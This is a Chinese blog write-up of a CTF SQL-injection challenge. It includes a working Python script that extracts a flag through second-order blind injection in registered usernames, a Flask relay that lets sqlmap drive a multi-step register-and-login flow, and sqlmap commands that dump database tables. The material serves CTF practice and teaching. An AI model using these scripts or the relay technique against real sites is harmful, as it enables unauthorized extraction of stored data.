前言
在渗透工作中我们经常能碰到一些逻辑复杂的SQL注入漏洞,并不能直接通过sqlmap工具注入拿到结果。今年网鼎杯的一道SQL注入题“张三的网站”让我久久不能忘怀,我不断思考遇到这类型的SQL注入除了手工注入然后编写脚本一点一点脱数据以外,有没有一个比较优雅的解决方案呢?
一道CTF题的思考
先来说说“张三的网站”这道题目,因为我手上没有题目源码,所以就根据记忆中的各个功能自己写了一个(很少写php,代码很烂),相关代码已经上传到GitHub,见文章底部。
该题目主要涉及3个页面:
登陆页面
注册页面
登陆后的主页
题目中的登陆页面、注册页面均无SQL注入漏洞,但是登陆后的主页在用户名处存在SQL注入漏洞。要利用此漏洞,需要在注册页面控制用户名,邮箱使用随机数生成的邮箱,密码随意,然后使用邮箱和注册时的密码登陆,登陆成功后跳转到主页,此时触发SQL注入漏洞。
注册名为“123”的用户:
注册名为“123'”的用户:
以下是一个Python脚本手工注入的解法:
import requests
import random
import re
import string
proxy = {'http': '127.0.0.1:8080'}
session = requests.session()
def register(username, email, password='123'):
burp0_url = "http://192.168.154.130:80/web/register.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/register.php", "Upgrade-Insecure-Requests": "1"}
burp0_data = {"name": username, "pw": password, "repw": password, "email": email, "submit": ''}
r = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)
def login(email, password='123'):
burp0_url = "http://192.168.154.130:80/web/login.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/login.php", "Upgrade-Insecure-Requests": "1"}
burp0_data = {"email": email, "pw": password, "submit": ''}
r1 = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)
# 跳转首页
burp0_url = "http://192.168.154.130/web/index.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Referer": "http://a434051f6c184741b1ede6b610a15f805a546b5b172748e9.changame.ichunqiu.com/login.php", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
r2 = session.get(burp0_url, headers=burp0_headers, proxies=proxy)
if r2.status_code == 302:
print('username payload no work')
elif r2.status_code == 200:
pattern = '''(.+?)'''
try:
userr = re.findall(pattern, r2.text, re.DOTALL)[0]
if userr:
return True
else:
return False
except:
return False
def main():
key = string.ascii_lowercase + string.digits + '{}_-'
flag = ''
for keynum in range(1, 43):
for s in key:
username = r"""'or(substr((select e.a from (select (select 1)a union select * from flag)e limit 2 offset 1) from {0} for 1) = '{1}') and '1""".format(keynum, s)
email = '{}@qq.com'.format(int(random.random() * 10000000))
register(username, email)
if login(email):
flag += s
print('key: ' + flag)
break
if __name__ == "__main__":
main()
如果对ctf不熟悉的朋友应该会很懵,因为语句中直接查询获取了flag表中的内容,而正常情况下,我们是不知道真正的flag在上面表,这样的解法我个人觉得不具备通用性,当然了在ctf比赛中是很高效的。
那么,有没有可能通过sqlmap来进行注入呢?显然,直接使用sqlmap不进行二次开发是无法检测出注入点的,因为sqlmap的注入逻辑不支持多个数据包的逻辑处理。于是我在想有无一种办法,拿到sqlmap的注入检测payload,然后我们通过Python编写相应的请求逻辑,再把响应结果返回到sqlmap呢?答案是可行的!
Flask中转sqlmap注入
代码实现的结构如下,首先创建一个flask服务,接收payload参数的值,然后传入函数custom_fun中,custom_fun函数由自己编写请求逻辑,把payload参数的值填入到存在注入点的参数中,然后发起请求,把最终响应结果return就行。最后通过sqlmap检测URL:http://127.0.0.1:5000/?payload=1即可,可以适当调整sqlmap的注入参数,比如--level、--risk、--technique等。
from flask import Flask
from flask import request
import requests
import random
def custom_fun(payload):
return ''
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'GET':
payload = request.args.get('payload')
elif request.method == 'POST':
payload = request.form.get('payload')
return custom_fun(payload)
def main():
app.run(host='127.0.0.1', debug=True)
if __name__ == "__main__":
main()
流程示意图如下:
完整注入过程
先来看看本例的实现代码:
from flask import Flask
from flask import request
import requests
import random
def custom_fun(payload):
email = '{}@qq.com'.format(int(random.random() * 10000000))
username = payload
password = '123'
proxy = {'http': '127.0.0.1:8080'}
session = requests.session()
# 注册
burp0_url = "http://192.168.154.130:80/web/register.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/register.php", "Upgrade-Insecure-Requests": "1"}
burp0_data = {"name": username, "pw": password, "repw": password, "email": email, "submit": ''}
resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)
# 登陆
burp0_url = "http://192.168.154.130:80/web/login.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/login.php", "Upgrade-Insecure-Requests": "1"}
burp0_data = {"email": email, "pw": password, "submit": ''}
r1 = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)
# 登陆后跳转到首页
burp0_url = "http://192.168.154.130/web/index.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
resp = session.get(burp0_url, headers=burp0_headers, proxies=proxy)
resp.encoding = resp.apparent_encoding
return resp.text
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'GET':
payload = request.args.get('payload')
elif request.method == 'POST':
payload = request.form.get('payload')
return custom_fun(payload)
def main():
app.run(host='127.0.0.1', debug=True)
if __name__ == "__main__":
main()
从代码上可以看到,只需要把请求逻辑写到custom_fun函数中,把最终结果的响应包return给flask,剩下的就可以交给sqlmap了,优雅!
这里说一个小技巧,可以使用Burp的拓展Copy As Python-Requests来一键把burp的请求复制为Python requests请求:
然后使用sqlmap测试一下,因为是通过本地flask中转,我们的sqlmap的target应该是本地的flask服务端口,命令如下:
sqlmap -u http://127.0.0.1:5000/?payload=1
检测时flask服务的输出:
成功检测到注入点:
当前数据库:
sqlmap -u http://127.0.0.1:5000/?payload=1 --current-db
跑表名:
sqlmap -u http://127.0.0.1:5000/?payload=1 -D test --tables
跑flag表数据:
sqlmap -u http://127.0.0.1:5000/?payload=1 -D test -T flag --dump
小结
Flask中转sqlmap注入并非本人原创,互联网上已有前辈发表过相关的案例,这里以一个ctf题目作为案例,来更加优雅地进行SQL注入。挖洞是不可能挖洞的,这辈子都不可能挖洞的,手工注入又不会,只能靠sqlmap,才能维持得了生活这样子...
京公网安备 11010802041100号